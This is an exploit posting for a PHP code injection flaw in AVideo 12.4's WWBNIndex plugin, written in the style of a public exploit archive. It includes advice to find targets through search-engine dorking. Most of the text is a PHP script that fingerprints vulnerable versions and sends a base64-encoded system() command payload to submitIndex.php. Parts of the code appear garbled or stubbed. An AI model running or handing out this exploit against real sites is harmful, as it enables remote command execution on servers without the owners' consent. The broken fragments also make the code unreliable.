============================================================================================================================================= | # Title : AVideo 12.4 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://github.com/WWBN/AVideo/tree/master | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] The following php code Upload shell file from external link. [+] Line 114 set your target. [+] Line 115 set your commands. [+] save code as poc.php . [+] USage : cmd = php poc.php . [+] PayLoad : target_uri = $target_uri; $this->payload = $payload; } public function exploit() { // إعداد الحمولة $php_code = "isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>"; $filter_payload = $this->generatePhpFilterPayload($php_code); // إرسال الطلب $data = http_build_query(['systemRootPath' => $filter_payload]); $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data); if ($response['code'] !== 200) { echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n"; } } public function check() { $response = $this->sendRequest('GET', '/index.php'); if (!$response) { return 'Failed to connect to the target.'; } if ($response['code'] !== 200) { return "Unexpected HTTP response code: " . $response['code']; } preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match); preg_match('//m', $response['body'], $version_match); if (empty($version_match[1])) { return 'Unable to extract AVideo version.'; } $version = $version_match[1]; $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php'); if ($plugin_check['code'] !== 200) { return 'Vulnerable plugin WWBNIndex was not detected'; } if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) { return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running."; } return "Detected non-vulnerable AVideo version: {$version}"; } private function sendRequest($method, $uri, $data = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($method === 'POST') { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return ['code' => $http_code, 'body' => $response]; } private function isArchPHP() { // افترض أن الحمولة عبارة عن كود PHP return true; // أو تحقق من ذلك بناءً على شروط معينة } private function generatePhpFilterPayload($php_code) { // يجب أن تضيف هنا منطق إعداد الحمولة (تصفية) return $php_code; // قم بتعديل ذلك بناءً على متطلباتك } } // مثال على كيفية الاستخدام: $target_uri = "http://target-url.com"; // أدخل عنوان الهدف هنا $payload = ""; // الحمولة المراد استخدامها $indoushka = new indoushka($target_uri, $payload); $check_result = $indoushka->check(); echo $check_result . "\n"; $indoushka->exploit(); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================